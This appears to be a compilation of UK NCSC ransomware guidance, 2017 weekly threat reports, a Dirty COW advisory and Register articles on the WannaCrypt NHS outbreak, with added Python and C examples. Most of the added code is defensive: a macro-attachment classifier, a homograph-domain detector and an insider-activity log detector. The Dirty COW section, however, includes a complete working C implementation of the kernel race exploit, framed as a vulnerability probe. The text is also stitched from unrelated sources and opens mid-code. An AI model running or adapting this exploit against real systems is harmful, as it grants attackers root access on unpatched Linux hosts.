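OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def find_vba_parts(data: bytes) -> list:
    """Return the names of VBA project parts inside an OOXML container, if any."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return [n for n in z.namelist() if n.lower().endswith(VBA_PART_SUFFIX)]
    except zipfile.BadZipFile:
        return []


def classify_attachment(filename: str, data: bytes) -> dict:
    """Decide allow / block / sandbox for one attachment from its content,
    not its extension alone (policy assumed for this example)."""
    ext = filename[filename.rfind("."):].lower() if "." in filename else ""
    reasons = []
    verdict = "allow"
    vba = find_vba_parts(data)
    if vba:
        verdict = "block"
        reasons.append("VBA project present: " + ", ".join(vba))
        if ext in OOXML_EXT and ext not in MACRO_ENABLED_EXT:
            # A macro part hidden under a 'safe' extension is a strong signal.
            reasons.append("macro content under non-macro extension " + ext)
    elif data.startswith(OLE2_MAGIC):
        # Legacy binary formats keep macros in OLE streams; a zip listing cannot
        # see them, so hand these to a deeper parser (e.g. oletools) or a sandbox.
        verdict = "sandbox"
        reasons.append("legacy OLE2 container, macro presence undetermined")
    return {"file": filename, "verdict": verdict, "reasons": reasons}


def build_sample(with_vba: bool) -> bytes:
    """Constructed minimal OOXML-shaped zip for the demonstration (not a real
    Word file, but laid out the way Word lays one out)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            z.writestr("word/vbaProject.bin", b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in [("invoice.docx", build_sample(True)),
                       ("report.docx", build_sample(False)),
                       ("old-quote.doc", OLE2_MAGIC + b"\x00" * 504)]:
        print(classify_attachment(name, blob))
```

The legacy OLE2 branch deliberately returns 'sandbox' rather than 'allow': the zip listing cannot see OLE streams, so macro presence in the old binary formats needs a dedicated parser, and an unknown should never default to delivery.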

What impact does ransomware have?

Ransomware will prevent access to systems or data until a solution is found. If systems are delivering critical services, this can have serious reputational, financial and safety impacts on affected organisations and their customers. Even if the victim has a recent backup of their system, it may still take considerable time to restore normal operations. During this time, organisations may have to invoke their Business Continuity processes.

It is worth noting that if a criminal organisation has carried out a successful ransomware attack, questions should be raised about the possibility of more indirect and lasting impacts. For example, how many instances of the ransomware are still present in the system waiting to be activated? How should they be removed, and how should users be warned? Were other types of malware also deployed at the same time? What are they and what will they do? And when?

Limiting the impact of a ransomware attack

The following measures can all help to limit the impact of a ransomware attack.

  • Good access control is important. The compartmentalisation of user privileges can limit the extent of the encryption to just the data owned by the affected user.  Re-evaluate permissions on shared network drives regularly to prevent the spreading of ransomware to mapped and unmapped drives. System administrators with high levels of access should avoid using their admin accounts for email and web browsing.
  • Ransomware doesn’t have to go viral in your organisation: limit access to your data and file systems to those with a business need to use them. This is good practice anyway and, like many of the recommendations we make here, protects against a range of cyber attacks.
  • Have a backup of your data. Organisations should ensure that they have fully tested backup solutions in place. Backup files should not be accessible by machines which are at risk of ingesting ransomware. It is important to remember backups should not be the only protection you have against ransomware - the adoption of good security practices will mean not getting ransomware in the first place. For further guidance on backups, please see our Securing Bulk Data guidance, which discusses the importance of knowing what data is most important to you, and how to back it up reliably.

What to do if your organisation has been infected with ransomware

If you need to know more about ransomware and its effects, or you have a ransomware issue, there are a number of sources of further advice and guidance:

  • The National Crime Agency encourages anyone who thinks they may have been subject to online fraud to contact Action Fraud at www.actionfraud.police.uk.  It is a matter for the victim whether to pay the ransom, but the NCA encourages industry and the public not to pay.
  • The National Cyber Security Centre (NCSC) runs a commercial scheme called Cyber Incident Response, where certified companies provide crisis support to affected organisations.
  • The Cyber Security Information Sharing Partnership (CiSP) offers organisations in the UK a safe portal in which to discuss and share intelligence that can assist the community and raise the UK's cyber resilience. We encourage our members to share technical information and indicators of compromise so that the effects of new malware, and particularly ransomware, can be largely reduced. 

Here at the NCSC, we welcome those who would like to share their experiences of ransomware in confidence. NCSC Operations provide threat intelligence to government, industry and the public. Case studies - even anonymised - can be very helpful.

UK hospital meltdown after ransomware worm uses NSA vuln to raid IT

Docs use pen and paper after computers scrambled amid global outbreak

Final update UK hospitals have effectively shut down and are turning away non-emergency patients after ransomware ransacked their networks.

Some 16 NHS organizations across Blighty – including several hospital trusts such as NHS Mid-Essex CCG and East and North Hertfordshire – have had their files scrambled by a variant of the WannaCrypt, aka WanaCrypt aka Wcry, nasty. Users are told to cough up $300 in Bitcoin to restore their documents.

Doctors have been reduced to using pen and paper, and closing A&E to non-critical patients, amid the tech blackout. Ambulances have been redirected to other hospitals, and operations canceled.

It is understood WannaCrypt, which is raiding companies and organizations across the planet today, is being spread by a worm that exploits unpatched vulnerabilities in Windows machines – particularly MS17-010, an SMB bug attacked by the leaked NSA tool, EternalBlue. The security hole has been patched for supported Windows versions, but not the out-of-support Windows XP – and the NHS is a massive user of the legacy operating system.

A spokesperson for NHS Digital said: "We're aware of a number of trusts that have reported potential issues to the CareCERT team. We believe it to be ransomware."

East and North Hertfordshire NHS confirmed in a press statement: "Today, the trust has experienced a major IT problem, believed to be caused by a cyber attack. Immediately on discovery of the problem, the trust acted to protect its IT systems by shutting them down; it also meant that the trust's telephone system is not able to accept incoming calls.

"The trust is postponing all non-urgent activity for today and is asking people not to come to A&E – please ring NHS111 for urgent medical advice or 999 if it is a life-threatening emergency."

It said the trust's IT specialists were working to clean up the mess.

"I'm led believe that there is a major attack underway on the NHS with systems down nationwide," one reader told us. "My wife is a GP and their systems were just shut down and they were told it was because of a 'National hack of the computer health care system'."

Updated to add

Payments appear to be being made to the Bitcoin addresses given in the NHS ransomware attack – which in turn confirms that the same strain of malware has infected Telefónica Spain, Gareth Corfield reports.

This same address is seen on computer screens in Spain and other countries hit by the WannaCrypt variant. A payment of 0.15 Bitcoin – worth roughly $266 at the time of writing – was made to that address two hours ago, as the Blockchain tracker shows. It is not possible to say who paid this amount. The NHS attackers are asking for $300 worth of Bitcoin in ransom payments.

NHS Digital response

NHS Digital confirmed a number of organisations have reported they have suffered a ransomware attack which is affecting a number of different organisations.

It said: "The investigation is at an early stage but we believe the malware variant is Wanna Decryptor. At this stage we do not have any evidence that patient data has been accessed. We will continue to work with affected organisations to confirm this. NHS Digital is working closely with the National Cyber Security Centre, the Department of Health and NHS England to support affected organisations and to recommend appropriate mitigations. This attack was not specifically targeted at the NHS and is affecting organisations from across a range of sectors.

"Our focus is on supporting organisations to manage the incident swiftly and decisively, but we will continue to communicate with NHS colleagues and will share more information as it becomes available." ®

Sophos waters down 'NHS is totally protected' by us boast

Watered down homeopathy for computers is more powerful, m'kay?

Updated Sophos updated its website over the weekend to water down claims that it was protecting the NHS from cyber-attacks following last week's catastrophic WannaCrypt outbreak.

Proud website boasts that the "NHS is totally protected with Sophos" became "Sophos understands the security needs of the NHS" after the weekend scrub-up.

Security-watchers, including former staffer Graham Cluley, noticed the reverse ferret.

Sophos didn't publish a definition update until 1825 BST, hours after an outbreak that forced hospitals to postpone scheduled treatments and appointments in scores of NHS Trusts. Sophos Live Protection functionality, if enabled, could detect WannaCrypt earlier than that.

Signature updates aren't the only layer of security in modern anti-malware but this only raises further questions about why Sophos's technology didn't pick up an attack based on a known exploit patched by Microsoft two months prior.

Sophos has been talking a lot about building better anti-ransomware defences over recent weeks, most particularly following the Invincea purchase back in February. Last month the company launched anti-ransomware CryptoGuard technology, a paid add-on to its Sophos Server Protection products.

El Reg asked Sophos to comment on what seemingly went wrong with its security defences but we're yet to hear back beyond an acknowledgement of our query.

Sophos's social media staff were tweeting about how its tech could protect against ransomware attacks on Thursday, a day before disaster struck.

It's all a bit awkward.

Sophos executives can, however, console themselves that the security firm's share price has risen markedly since the outbreak, rising 7.5 per cent in pre-lunchtime trading on Monday alone to reach 366.80 at the time of writing. ®

Updated at 15.05 UTC to add: Sophos has contacted us to say that customers using Sophos Intercept X or Exploit Prevention (EXP) "were protected proactively against the ransomware behaviour from the very first instance".

It added: "Sophos Endpoint Protection already detected some variants of the WannaCry ransomware. We added further detection at 15.58 UTC on Friday 12th May for samples in the new attack that we missed. This was a complex set of executables and exploits which took some time to analyse. We also thoroughly test all identity and rule updates before releasing them to our customers. The 17.25 UTC time in the KBA on our website is the time by which all our customers should have been updated. We are in the process of updating this wording in the KBA to be clearer.

"Sophos has added subsequent identities and generic detection rules to Sophos Endpoint Protection since then to block potential future variants of the malware and its techniques. We have also proactively contacted all our customers to advise them to deploy the Microsoft patch that mitigates the underlying vulnerability in the Microsoft OS."

NCSC - Weekly Threat Report 5th May 2017

This report is drawn from recent open source reporting

Google and Facebook were victims of Business Email Compromise (BEC) or ‘CEO Fraud’

Google and Facebook have been identified as the victims of an email phishing attack for which a Lithuanian man was charged in March 2017.

The attack relied upon social engineering rather than technical intrusion techniques. Even so, the individual was able to trick the organisations into transferring over $100 million between 2013 and 2015, highlighting how cyber-enabled social engineering can be used effectively to commit fraud.

The individual posed as a manufacturer which both firms had existing business relationships with, and sent emails which were designed to look like they came from the manufacturer. The emails contained forged invoices and contracts which appeared to have been signed by executives. This is less technically sophisticated than some other cases of BEC whereby the third-party supplier’s legitimate email is compromised and used to request transfers. The phishing emails were highly targeted, sent to Facebook and Google employees who regularly conducted multi-million dollar transactions with the manufacturer the scammer was impersonating.

Large organisations are especially vulnerable to attacks such as this: often suppliers and individuals have less face to face interaction, and therefore may have reduced opportunities to identify bogus or suspicious transfer requests through conversation.

Fraudulent communication to convince organisations to transfer funds is not new, however it is increasingly common as a low cost, high return crime. Other variations on this attack include

  • Spear-phishing emails co-ordinated with phone calls confirming the email request
  • Impersonation of trusted partners beyond suppliers, including charities, law firms, think tanks or academic institutions
  • Impersonation of fellow employee emails, either through compromising an account, or creating a similar looking fake address
  • Use of social media to research or make contact with potential victims

The NCSC has previously issued guidance on phishing attacks aimed at senior executives or payment departments.

 

Facebook outlines plan to combat information operations

Facebook has outlined measures to combat “information operations”, which it defines as efforts conducted by organisations, including governments, to spread misleading information and falsehoods to “distort domestic or foreign political sentiment". Whilst reporting has focused on the potential impact on democratic processes, manipulation of social media could similarly be used to inflict reputational or even financial damage on organisations. An example of this would be the 2013 fake “alert” from one of America’s most trusted news sources, briefly fooling some news outlets into reporting that an explosion had occurred at the White House and causing the Dow Jones to drop 145 points in two minutes.

Facebook has highlighted that information operations extend beyond the creation of “fake” news stories: other activities such as the dissemination and promotion of stolen information, and targeted data collection on individuals have all been noted. Furthermore, the increased circulation of “fake” news stories to a larger audience is regularly achieved through artificial amplification of posts, whereby paid individuals, often using fake accounts, use techniques such as co-ordinating “likes” to boost the prominence of key postings or creating groups that camouflage propaganda by including legitimate items.

Facebook has stated that it will mitigate the artificial amplification of fake stories using machine learning and analysis to identify bogus accounts, which will then be suspended or deleted. For example, Facebook suspended 30,000 accounts in France prior to the first round of the French presidential election.
 

Vulnerabilities

Mainly platform agnostic/cross platform updates this week, leaning towards Linux and Unix based systems.

Intel released a fix to their Active Management Technology to address a flaw which could allow remote and local users to gain elevated privileges. A mitigation guide has been published here.

IBM released two updates for WebSphere to fix a browser redirect and cross-site request forgery vulnerability, and an update to DB2 to address a bug that could allow a local user to obtain root privileges.

Xen saw a number of updates to fix elevation of privilege bugs.

HPE updated NonStop Server to address a flaw that could allow a remote user to obtain sensitive information, and updated Intelligent Management Center to fix a flaw that could allow for remote code execution.

Elsewhere this week there were updates from Trend Micro to fix cross-site scripting bugs and an elevation of privilege bug. Drupal fixed a flaw that could allow access to the target system and FreeBSD fixed a bug which could cause the target to reload.

Debian updates this week include LibreOffice, Ghostscript, Freetype, weechat, Libxstream-Java, MySQL-Connector-Java, Tomcat7 and Tomcat8.

ICS updates this week came from Advantech, CyberVision and Schneider Electric.

No individual sector is anticipated to be impacted more than any other this week.

NCSC - Weekly Threat Report 28th April 2017

This report is drawn from recent open source reporting

Increase in Homographic Phishing Attacks

Recent media reporting highlights a threefold increase in homographic phishing attacks over the past fourteen months.

Homographic attacks have been widely known about for many years, and rely on the fact there are visual similarities between many different Unicode characters to spoof well-known web addresses using similar-looking Punycode domains. For example, by registering the Unicode domain “www.xn--googl-z8a.com” an attacker would be in control of a web address, which will render in browsers as “www.googlė.com”, almost indistinguishable from the real thing.

Moreover, researchers have recently demonstrated that some browsers will display such a domain in its Unicode form rather than as Punycode when every character in the label comes from a single non-Latin script. By choosing letters from one foreign script whose glyphs match the target’s Latin letters, an attacker can register a domain that looks identical to the targeted one when rendered by vulnerable browsers. For example, proving the concept, a researcher recently registered the domain name “xn--80ak6aa92e.com”, which is made up entirely of Cyrillic letters and renders as a string visually identical to “apple.com”.

Mitigations such as using password managers can help users spot fake websites: a password manager matches saved credentials to the exact domain, so it will not offer to fill the “apple.com” login on a look-alike domain, and that silence is itself a warning. In addition, email anti-spoofing measures (SPF, DKIM and DMARC) can help prevent phishing email attacks from reaching users in the first place.
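
To show how the homograph check can be automated, here is an added example in Python, not from the NCSC report, that decodes a Punycode hostname, reports whether any label mixes scripts, and compares a 'skeleton' of the decoded name (each confusable letter replaced by the ASCII letter it resembles) against a list of domains worth protecting. The confusables table is a small hand-picked subset of the Unicode TR39 data and the protected-domain list is assumed for the example; the 'xn--80ak6aa92e.com' input is the apple.com proof-of-concept named above.

```python
import unicodedata

# Subset of the Unicode confusables data (TR39), constructed for this example:
# Cyrillic and Latin letters that render like ASCII letters in common fonts.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u04cf": "l", "\u0456": "i", "\u0458": "j",
    "\u0455": "s", "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u0117": "e",  # Latin small e with dot above, as in the googlė example
}

# Domains you care about being impersonated (assumed list for the example).
PROTECTED = {"apple.com", "google.com"}


def decode_label(label: str) -> str:
    """Turn one ACE label (xn--...) into Unicode. The punycode codec is used
    directly rather than the idna codec so that labels which fail IDNA's
    round-trip check are still decoded and can be inspected."""
    if label.lower().startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def script_of(ch: str) -> str:
    """Approximate script from the first word of the character name, e.g. CYRILLIC."""
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def skeleton(text: str) -> str:
    """Replace each confusable character with the ASCII letter it resembles."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)


def analyse(host: str) -> dict:
    """Decode a hostname and report homograph indicators."""
    labels = [decode_label(part) for part in host.lower().split(".")]
    unicode_host = ".".join(labels)
    findings = []
    for label in labels:
        # A label that mixes scripts (Latin 'pple' after a Cyrillic 'а') is the
        # classic case that browsers already force back to Punycode.
        scripts = {script_of(c) for c in label if c.isalpha()}
        if len(scripts) > 1:
            findings.append(f"mixed scripts in label {label!r}: {sorted(scripts)}")
    # A single-script label can still be a look-alike: compare skeletons.
    skel = skeleton(unicode_host)
    if skel != unicode_host and skel in PROTECTED:
        findings.append(f"look-alike of protected domain {skel}")
    return {"unicode": unicode_host, "skeleton": skel,
            "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for h in ("xn--80ak6aa92e.com", "apple.com", "\u0430pple.com"):
        print(analyse(h))
```

The punycode codec is used directly instead of Python's idna codec because idna re-encodes the decoded label and rejects anything that does not round-trip; a detector wants to see those labels too rather than discard them. The skeleton comparison is what catches the single-script Cyrillic case that a mixed-script rule alone misses.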


Vulnerabilities

An altogether quieter week than we have seen for a while on the vulnerabilities front. There were a number of updates from Cisco for IOS, ASA, Prime Infrastructure and Prime Network Registrar to fix cross-site scripting attacks, denial of service or target restart vulnerabilities. IBM updated WebSphere and Security Guardium this week to fix escalation of privilege bugs and also updated Domino to fix a remote code execution bug.

Palo Alto fixed an input validation flaw in PAN-OS to prevent cross-site scripting attacks and F5 Networks fixed a denial of service bug in BIG-IP and let users know about a bug in F5 Enterprise Manager which could lead to denial of service conditions, but for which no fix is currently available.

Elsewhere there were updates for Adobe ColdFusion, Apache Batik, Novell NetIQ and cURL/libcurl.

In terms of Debian this week there were updates for MySQL, Python-Django, Icedove/Thunderbird and libav.

Also a quiet week with regard to ICS-specific updates with just two: one for BLF-Tech and one for Sierra Wireless AirLink Raven.

NCSC - Weekly Threat Report 21st April 2017

Hajime – What is the intent of this IoT Botnet?

In October 2016 the security research group at Rapidity Networks discovered a new malware, called Hajime, with similarities to the Mirai botnet: it targets Internet of Things (IoT or internet-connected) devices by scanning the Internet for devices with exposed, vulnerable network services and attempts to log in to them using known default username/password combinations. According to Symantec, Hajime is believed to have infected between 130,000 and 180,000 devices worldwide, with Brazil and Iran having the most infections followed by Thailand and Russia. Industry partners have suggested that the number of UK devices infected currently stands at approximately 5,000.

Hajime is being compared to the Mirai malware for a number of reasons including: similarities between initial infection vectors; the targeting of internet connected devices and the use of command and control (C2) servers to communicate and send instructions out to infected devices.  Hajime however differs as it adopts a decentralized approach with a Peer to Peer (P2P) model where communication and instructions are passed between infected nodes rather than the more traditional client-server architecture.  It is believed that this type of approach makes the malware much more resilient to take down as it does not rely on just one central server to control the malware.

The Hajime malware is also different because it does not, as yet, appear to have been used for malicious ends. Researchers have hypothesised that the controllers could be waiting for more devices to be infected before launching an attack. A more recent theory is that Hajime was created by vigilante ‘ethical’ hackers who are infecting Mirai-susceptible devices with Hajime in order to deny Mirai any harmful use of them.

Malware targeting of IoT devices is not new and as these products are becoming more popular amongst consumers, manufacturers and suppliers should be aware of the emerging risks and cyber threats posed when attention is not paid to IoT security.

See the NCSC website for guidance on malware prevention.
 

Insider steals employer’s proprietary trading code

A computer engineer has been charged with illegally exfiltrating the proprietary algorithmic trading model code from a global financial services firm headquartered in New York, where he worked. The code is used by the firm to generate income by predicting market movements.

From December 2016 to March 2017, the engineer took steps to obfuscate his presence on areas of the company’s network that he was not authorised to access. He used discrete areas of the network to collect over three million files, including unencrypted portions of the algorithmic source code, before exfiltrating it.

The motivation for this activity has not been conclusively reported, nor whether this individual acted alone, or on behalf of another. The tasking of insiders by criminals to exploit access to corporate networks is a common occurrence. But the exfiltration of this particular source code is significant because trading platforms could be manipulated to allow vast amounts of money to be stolen in a single attack. Alternatively the intellectual property (IP) could be sold to a rival company.

Companies can mitigate the insider threat by adopting security policies that restrict access to the most sensitive data to those who need it, and by alerting on unusual activity, such as a user reaching into areas of the network outside their role or collecting files in unusual volumes.
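
As an added example, constructed here rather than taken from the report, the following Python script shows one shape the 'alert on unusual activity' recommendation can take on file-server logs: learn, per user, which shares they normally touch and their busiest single day during a baseline period, then flag later days on which they reach into a share outside that baseline or read many times their usual volume. The daily summary lines, user names and share names are made up for the demonstration, and the thresholds are tunable assumptions.

```python
from collections import defaultdict
from datetime import date

# Constructed daily summary of file-server reads (not real data):
# "date user share files_read", one line per user, share and day.
SAMPLE_LOG = """\
2016-11-02 jsmith eng-tools 120
2016-11-03 jsmith eng-tools 95
2016-11-04 jsmith eng-tools 140
2016-11-02 akhan quant-research 60
2016-11-03 akhan quant-research 75
2016-12-12 jsmith eng-tools 110
2016-12-13 jsmith quant-research 4800
2016-12-14 jsmith quant-research 62000
2016-12-13 akhan quant-research 70
"""

BASELINE_END = date(2016, 12, 1)   # records before this date define normal behaviour
VOLUME_FACTOR = 5                  # alert above this multiple of the user's peak day...
MIN_FILES = 500                    # ...but never below this floor, to avoid noisy low-volume users


def parse(log: str) -> list:
    """Turn the summary text into (date, user, share, files_read) tuples."""
    rows = []
    for line in log.strip().splitlines():
        day, user, share, n = line.split()
        rows.append((date.fromisoformat(day), user, share, int(n)))
    return rows


def build_baseline(rows: list):
    """Per user: the set of shares normally touched and the busiest single day."""
    shares = defaultdict(set)
    peak = defaultdict(int)
    for day, user, share, n in rows:
        if day < BASELINE_END:
            shares[user].add(share)
            peak[user] = max(peak[user], n)
    return shares, peak


def detect(log: str) -> list:
    """Return (date, user, reason) alerts for records after the baseline period."""
    rows = parse(log)
    shares, peak = build_baseline(rows)
    alerts = []
    for day, user, share, n in rows:
        if day < BASELINE_END:
            continue
        if share not in shares[user]:
            # A user with no baseline at all (new account) is flagged on every share,
            # which is the conservative choice for a first-seen identity.
            alerts.append((day, user,
                           f"first access to share {share}; baseline {sorted(shares[user])}"))
        threshold = max(MIN_FILES, VOLUME_FACTOR * peak[user])
        if n > threshold:
            alerts.append((day, user, f"{n} files read on {share}, threshold {threshold}"))
    return alerts


if __name__ == "__main__":
    for day, user, reason in detect(SAMPLE_LOG):
        print(day, user, reason)
```

In the sample, jsmith's baseline is a single engineering share with a 140-file peak, so both the first read of quant-research and the 4,800-file day trip alerts, while akhan's routine reads of the same share do not. A real deployment would replace the constructed summary with per-user counts from the file server's audit log, and add the obvious second signal of bulk transfers off the network.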
 

Hotpoint service site compromise

Recent reporting by cyber security company Netcraft noted the compromise of domestic appliance manufacturer Hotpoint’s UK and Irish service websites, which has since been confirmed by Hotpoint in a statement via the Register. Customers accessing the service website were reportedly presented with fake Java dialogs, which if clicked, directed users to possibly malicious third party websites, presenting a risk that users could be infected with malware. Netcraft note that the compromise occurred shortly before the Easter weekend, suggesting that this may have been done deliberately to maximise the impact.

According to the company’s statement, no customer data was compromised and the vulnerabilities were quickly resolved. Netcraft suggest that the site’s WordPress installation may have been responsible. The NCSC provides guidance on minimising the vulnerabilities to WordPress, including the recommendation to implement regular security updates of WordPress as well as any plug-ins, only using trusted plug-ins and replacing default or easy to crack passwords.
 

Vulnerabilities

There have been a large number of updates over the last week, thanks in part at least to Oracle’s quarterly update cycle falling this week. Oracle’s updates affect multiple bugs in many of their products, from PeopleSoft, E-Business Suite, Financial Services and Java SE to MySQL, WebLogic and Solaris.

Both Mozilla and Google released updates to fix multiple vulnerabilities, the most serious of which could allow remote code execution, in their browser products, Firefox and Chrome respectively and there were three updates for BIND.

Magento saw an update to prevent the uploading of arbitrary files and remote users conducting cross-site request forgery attacks. There were also a number of updates from Cisco for ASA, IOS and Unified Communications Manager. Juniper released a number of updates for Junos.

On the virtualisation front there were updates this week for both VMware and VirtualBox.

Elsewhere this week there were updates for SquirrelMail, WatchGuard, Nessus, Wireshark and MantisBT.

On the Debian side this week saw updates for Firefox-ESR and ICU. ICS specific updates this week came from Belden Hirschmann, Schneider Electric and Wecon.

Advisory: ‘Dirty COW’ Linux privilege escalation vulnerability being actively exploited

Executive Summary

A vulnerability has been discovered in the Linux kernel which could give untrusted users unfettered root access. This vulnerability has been present in the Linux kernel for nine years but has only just been discovered. The vulnerability allows for privilege escalation that can be exploited easily and reliably. The fact that this flaw exists in nearly every version of Linux from at least the last nine years means this vulnerability should be taken seriously and patched as soon as distribution specific patches are available.

What is it?

As their name suggests, privilege escalation vulnerabilities allow attackers who already have limited access to a computer to gain much greater access rights, and therefore control over the system. The vulnerability itself is a race condition in the way the Linux kernel’s memory management handles a duplication technique called copy-on-write. Untrusted users can exploit it to gain write access to memory mappings that would normally be read-only, including private mappings of files they are not permitted to modify. More technical details about the vulnerability and exploit are available below. Using the acronym derived from ‘copy-on-write’, some researchers have dubbed the vulnerability ‘Dirty COW’.

Which products are affected?

The vulnerability affects most versions of Linux released in the last nine years, which given the ubiquity of the open source operating system, means a large number of unpatched systems are potentially exposed to the exploit. Researchers are already claiming to see the Dirty COW vulnerability being exploited out in the wild.

What could happen if the vulnerabilities were exploited?

These exploits could be used against Web hosting providers that provide shell access, such that one customer could attack other customers or service administrators.

Privilege escalation exploits can also be combined with other attacks to target other vulnerabilities. A SQL injection weakness in a website, for instance, often allows attackers to run malicious code only as an untrusted user. Combined with an escalation exploit an attacker could achieve root access.

How can I find out if I am at risk?

If you are running a Linux distribution released in the last nine years, the system is likely to be vulnerable unless it has been patched recently. Note that distributions backport fixes without changing the kernel's version number, so a version string alone does not tell you whether the fix is present; check your distribution's advisory for the patched package version.
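A direct way to answer that question, added here as a worked example rather than code from the NCSC report, is to run the race itself against a throwaway file and see whether the write reaches the file. The program below uses the same technique as the public proof-of-concept code: one thread repeatedly calls madvise(MADV_DONTNEED) on a read-only, private mapping of the file while another thread repeatedly writes to that address through /proc/self/mem. On a patched kernel the write always ends up in the process's private copy and the file is unchanged; on a vulnerable kernel it lands on the shared page-cache page, and re-reading the file shows the payload. A real attacker would aim this at a root-owned file they can only read; the probe uses a temporary file owned by the current user, so nothing on the system is damaged either way. The file path, payload string and iteration count are assumptions chosen for the example, and the code is Linux-only.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* State shared by the two racing threads. */
struct race {
    void *map;            /* read-only, MAP_PRIVATE mapping of the target file */
    size_t len;
    const char *payload;  /* bytes we try to push through the mapping */
    long iterations;      /* how long to race before giving up */
    volatile int abort;   /* set when the probe cannot run in this environment */
};

/* Thread A: keep discarding the process's private copy of the page, so every
 * write below must fault the page back in and take the copy-on-write path. */
static void *madvise_loop(void *arg)
{
    struct race *r = arg;
    for (long i = 0; i < r->iterations && !r->abort; i++)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* Thread B: write at the mapping's address through /proc/self/mem. That is allowed on
 * a read-only private mapping because the kernel is meant to divert the write into a
 * private copy; the Dirty COW race lets it land on the shared page-cache page instead. */
static void *write_loop(void *arg)
{
    struct race *r = arg;
    int mem = open("/proc/self/mem", O_RDWR);
    if (mem < 0) { r->abort = 1; return NULL; }
    size_t n = strlen(r->payload);
    for (long i = 0; i < r->iterations && !r->abort; i++) {
        if (pwrite(mem, r->payload, n, (off_t)(unsigned long)r->map) != (ssize_t)n) {
            r->abort = 1;   /* e.g. a sandbox that refuses writes to /proc/self/mem */
            break;
        }
    }
    close(mem);
    return NULL;
}

/* Create the target file with known content (mode 0644). Returns 0 on success, -1 on error. */
int write_target(const char *path, const char *content)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    int ok = write(fd, content, strlen(content)) == (ssize_t)strlen(content);
    close(fd);
    return ok ? 0 : -1;
}

/* Race for `iterations` rounds, then re-read the file through the page cache.
 * Returns 1 if its content changed (kernel vulnerable), 0 if it did not (kernel
 * patched), -1 if the probe could not be run here. The file is opened read-only. */
int dirtycow_probe(const char *path, const char *payload, long iterations)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || st.st_size < (off_t)strlen(payload)) { close(fd); return -1; }
    size_t len = (size_t)st.st_size;
    char *before = malloc(len), *after = malloc(len);
    void *map = mmap(NULL, len, PROT_READ, MAP_PRIVATE, fd, 0);
    int result = -1;
    if (before && after && map != MAP_FAILED && pread(fd, before, len, 0) == (ssize_t)len) {
        struct race r = { map, len, payload, iterations, 0 };
        pthread_t a, b;
        if (pthread_create(&a, NULL, madvise_loop, &r) != 0) r.abort = 1;
        else if (pthread_create(&b, NULL, write_loop, &r) != 0) { r.abort = 1; pthread_join(a, NULL); }
        else { pthread_join(a, NULL); pthread_join(b, NULL); }
        if (pread(fd, after, len, 0) == (ssize_t)len)
            result = memcmp(before, after, len) != 0 ? 1 : (r.abort ? -1 : 0);
    }
    if (map != MAP_FAILED) munmap(map, len);
    close(fd);
    free(before); free(after);
    return result;
}

int main(void)
{
    const char *path = "/tmp/dirtycow_probe.txt";   /* constructed target; the probe never opens it for writing */
    if (write_target(path, "original content of the throwaway target file") != 0) return 2;
    int r = dirtycow_probe(path, "DIRTY COW WAS HERE", 200000);
    printf("%s\n", r == 1 ? "VULNERABLE: the file's content changed" : r == 0 ?
           "not vulnerable: the write stayed in the private copy" : "probe could not run here");
    unlink(path);
    return r == 1;
}
```

Compile with `cc -O2 -pthread dirtycow_probe.c` (the -pthread flag is needed on older glibc) and run as an ordinary user. A result of 0 after a few hundred thousand iterations means the copy-on-write path held; 1 means the kernel is vulnerable and the patched kernel package should be installed without delay; -1 means the environment (for example a sandbox that forbids writes to /proc/self/mem) prevented the probe from running, which is no evidence either way. Because distributions backport the fix, this probe is more reliable than comparing kernel version strings.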

How can I tell if this exploit has been used against me?

It would be very difficult to determine whether you have been the victim of this type of attack, since exploiting the bug leaves nothing abnormal in the logs. Activity that follows a successful escalation is more likely to leave evidence than the exploit itself.

What can I do?

The underlying bug was patched this week by the maintainers of the official Linux kernel. Downstream distributors are in the process of releasing updates that incorporate the fix. Red Hat has classified the vulnerability as "important". Other distributions have released patches, and these should be tested and applied as soon as possible.

Threat to Managed Service Providers

A major cyber campaign against Managed Service Providers (MSPs) has been detected that may present risks to organisations using outsourced IT services.

Media references to terrorist cyber capability

There have been numerous reports on the recently imposed restrictions on electronic devices larger than a smartphone being allowed in cabin baggage on flights from certain countries in the Middle East, North Africa and Turkey. A statement from the US Department of Homeland Security (DHS) said: "Evaluated intelligence indicates that terrorist groups continue to target commercial aviation, to include smuggling explosive devices in various consumer items". This physical terrorist threat to aviation is entirely separate from news reports suggesting a raised cyber terrorist threat against the civil nuclear sector. As highlighted in the recent NCSC/NCA Annual Report, the NCSC assesses that terrorist organisations currently have limited cyber capability. While they may aspire to cause a destructive cyber attack, this remains unlikely.

Malware Threat to ATMs

A fileless malware campaign that successfully targeted 140 organisations worldwide earlier this year has evolved. Criminals are now exploiting their remote access to banks' networks to drop additional malware called ATMitch, enabling them to issue remote commands to compromised ATMs to dispense cash. Banks in Russia and Kazakhstan have reportedly been victims of this malware.

Although we have previously seen cyber criminals use malware to steal cash from ATMs, using a bank's internal network to deliver ATM malware remotely is a new and more sophisticated form of attack. Also, because the malware is fileless, the criminals can remove the malicious commands from the ATM's hard drive and leave few traces of the attack.

